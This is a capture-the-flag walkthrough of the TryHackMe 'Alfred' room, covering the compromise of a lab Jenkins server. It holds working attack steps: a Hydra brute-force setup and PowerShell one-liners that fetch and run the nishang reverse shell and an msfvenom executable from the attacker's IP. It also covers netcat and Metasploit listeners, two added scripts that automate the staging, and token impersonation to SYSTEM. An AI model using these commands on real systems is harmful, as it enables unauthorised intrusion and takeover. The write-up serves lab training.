TryHackMe — Alfred Walkthrough

Disclaimer:

This walkthrough is intended for documentation purposes. This is in no way the most efficient way to crack this machine, nor the most amazing one. I do such documentation solely for write-up and grammar practice LOL. Happy hacking!


Machine Information:


Task 1 — How many ports are open?


Accessing the site at http://10.10.54.66:80 does not give much information.


A second web service is open on port 8080; that is the Jenkins login panel used in the next task.


Task 2 — What is the username and password for the login panel (in the format username:password)?

In order to brute force the login form with Hydra, three things must be accurate: the URL the form posts to, the form parameter names, and the login error string. Hydra decides whether a guess failed by looking for that string in the response, so a wrong string makes every guess look valid.

The URL and the form parameters can be read from the login request captured with Burp Suite.

Capture the login request with the Burp Suite Proxy and read the POST path and field names from it.

Parameters for Hydra:

URL: /j_acegi_security_check

USER = j_username

PASS = j_password

Port = 8080

For the username and password lists, a list of the most common credentials is enough for this machine.
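The Hydra invocation built from the parameters above, as an added example that is not part of the original post. It assumes the target 10.10.54.66:8080, wordlists named users.txt and passwords.txt, and that a failed Jenkins login answers with a redirect to /loginError, which is used as the failure string; the two HTTP responses are constructed inline to show the check Hydra applies to each guess.

```shell
#!/bin/sh
# Added example (not from the original post): build the Hydra command for the
# Jenkins login form and show the check Hydra applies to each response.
# Assumptions: target 10.10.54.66:8080, wordlists users.txt and passwords.txt,
# and that a failed Jenkins login answers with a redirect to /loginError.
set -u

# Hydra's http-post-form module takes "path:body:failure-string".
# ^USER^ and ^PASS^ are replaced by Hydra with each guess.
build_hydra_cmd() {
    target="$1"; port="$2"; users="$3"; passwords="$4"
    form='/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:loginError'
    printf 'hydra -L %s -P %s -s %s %s http-post-form "%s"\n' \
        "$users" "$passwords" "$port" "$target" "$form"
}

# The same decision Hydra makes: if the failure string appears in the response
# the guess was wrong. Returns 0 for valid credentials, 1 for a failed guess.
# A failure string that never appears (or one that always appears) is what makes
# Hydra report every guess as valid, so verify it against a known-bad login first.
login_succeeded() {
    if printf '%s' "$1" | grep -q 'loginError'; then
        return 1
    fi
    return 0
}

# Constructed sample responses (not captured from the room machine).
FAILED_RESPONSE=$(printf 'HTTP/1.1 302 Found\r\nLocation: http://10.10.54.66:8080/loginError\r\n\r\n')
OK_RESPONSE=$(printf 'HTTP/1.1 302 Found\r\nLocation: http://10.10.54.66:8080/\r\nSet-Cookie: JSESSIONID.x=abc; Path=/; HttpOnly\r\n\r\n')

build_hydra_cmd 10.10.54.66 8080 users.txt passwords.txt
if login_succeeded "$FAILED_RESPONSE"; then echo "BUG: failed login counted as success"; else echo "loginError redirect: wrong guess"; fi
if login_succeeded "$OK_RESPONSE"; then echo "redirect to /: valid credentials"; fi
```

Run the printed hydra command from the Kali machine; before trusting its output, submit one deliberately wrong password by hand and confirm the failure string really appears in that response.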


Logging in to the website with admin:admin succeeds.


One notable section of the site is the “project” (the Jenkins build job).


The project's “Configure” page contains a build step that runs commands on the server, which is what the next task uses.


Task 3:

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it:

powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server

To accomplish this task, download Invoke-PowerShellTcp.ps1 to the Kali machine and serve it with a Python web server.

The whole nishang repository can be cloned from GitHub, but since Invoke-PowerShellTcp.ps1 is the only script needed, it can be downloaded on its own from https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1 and saved as Invoke-PowerShellTcp.ps1. Note that this blob URL serves GitHub's HTML page; when fetching with curl or wget, use the raw link (https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1) or the target will download HTML instead of PowerShell.

Start a web server on the Kali machine in the folder that holds the script with python -m SimpleHTTPServer 80 (Python 2) or python3 -m http.server 80; binding port 80 requires root.


To make the target fetch and run the script, put the following command in the Configure build step (note the straight quotes and the space before -Port; the curly quotes that a web page pastes will break it):

powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.8.234:80/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.8.234 -Port 1337

Before triggering it, start a netcat listener on the Kali machine with nc -lvnp 1337.


After saving and applying the configuration on the Configure tab, click “Build Now” so the build step runs and the script takes effect.
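The staging steps above collected into one script, as an added example that is not part of the original post or of the nishang project. It assumes the attacker VPN address 10.9.8.234, listener port 1337, web server port 80 and the raw GitHub URL for the script; the function that builds the build-step command is kept separate so its output can be checked before it is pasted into Jenkins.

```shell
#!/bin/sh
# Added example (not from the original post or the nishang project): stage the
# nishang reverse shell for the Jenkins build step. Assumptions: attacker VPN
# address 10.9.8.234, listener port 1337, web server port 80, raw GitHub URL.
set -u

NISHANG_RAW='https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1'

# Build the one-liner to paste into the Jenkins build step. Generating it
# avoids the two classic mistakes: a missing space before -Port and smart
# quotes copied from a web page.
jenkins_payload_cmd() {
    lhost="$1"; lport="$2"; http_port="$3"
    printf "powershell iex (New-Object Net.WebClient).DownloadString('http://%s:%s/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\n" \
        "$lhost" "$http_port" "$lhost" "$lport"
}

# The served file must be the PowerShell script, not GitHub's HTML page
# (which is what the blob URL returns).
looks_like_powershell() {
    grep -q 'function Invoke-PowerShellTcp' "$1"
}

stage_and_listen() {
    lhost="$1"; lport="$2"; http_port="$3"
    curl -fsSL "$NISHANG_RAW" -o Invoke-PowerShellTcp.ps1
    looks_like_powershell Invoke-PowerShellTcp.ps1 || {
        echo 'downloaded file is not the .ps1 (blob URL instead of raw?)' >&2
        return 1
    }
    python3 -m http.server "$http_port" >/dev/null 2>&1 &   # serve the script
    echo "Paste into the Jenkins build step, save, then click Build Now:"
    jenkins_payload_cmd "$lhost" "$lport" "$http_port"
    nc -lvnp "$lport"                                      # catch the shell
}

# Usage (needs the VPN up; port 80 needs root): stage_and_listen 10.9.8.234 1337 80
```

The listener is started last, in the foreground, so the shell lands in this terminal; the HTTP server keeps running in the background until the terminal is closed.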


Results: once the build runs, the netcat listener on the Kali machine receives the reverse shell from the target.

Task 4: What is the user.txt flag?


Task 5: What is the final size of the exe payload that you generated?

To accomplish this task, generate a Metasploit reverse-shell executable with msfvenom, using the Kali VPN address and a port of your choice as LHOST and LPORT; the same values must be reused for the handler below.


The final size of the exe file is 73802 bytes.


Use this command in the build step to download the payload onto the target machine:

powershell "(New-Object System.Net.WebClient).DownloadFile('http://10.9.8.234:8000/shells.exe','shells.exe')"

WebClient.DownloadFile resolves a relative path against the process working directory (the job workspace when run from Jenkins), not against PowerShell's own location, so give a full path if the file does not appear where you expect.

It is important that python -m SimpleHTTPServer 8000 is running in the folder that contains shells.exe.


Once the command above has run, shells.exe is on the target machine.

To execute shells.exe, use Start-Process "shells.exe" in the build step. Before running it, a listener must already be running on the Kali machine; in this case it is exploit/multi/handler, configured with the same payload, LHOST and LPORT that were given to msfvenom.


Now that the listener is running on the Kali machine, it is time to execute shells.exe.


If it does not work on the first try, check LHOST: the handler must listen on an address the target can reach.


Set it to tun0 or to the IP address TryHackMe assigns to your VPN connection, run the exploit again, and re-run shells.exe on the target machine.


The handler receives the connection and a Meterpreter session opens.


Task 6: View all the privileges using whoami /priv

From the Meterpreter session, drop to a command prompt with shell and run whoami /priv; the output lists SeDebugPrivilege and SeImpersonatePrivilege as enabled, which is what the next task abuses.

Task 7: You can see that two privileges (SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let's use the incognito module that will allow us to exploit this vulnerability. Enter: load incognito to load the incognito module in Metasploit. Please note, you may need to use the use incognito command if the previous command doesn't work. Also ensure that your Metasploit is up to date.

Load incognito with load incognito.

List the available tokens with list_tokens -g (the group tokens; -u lists user tokens). The delegation token for BUILTIN\Administrators appears in the group list.

Impersonate the BUILTIN\Administrators token with impersonate_token "BUILTIN\Administrators" (escape the backslash as \\ if your Meterpreter version requires it); getuid then reports NT AUTHORITY\SYSTEM.

Task 8: Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS


Task 9: read the root.txt file at C:\Windows\System32\config


Resources:

https://tryhackme.com/room/alfred

http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html

Written by

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.
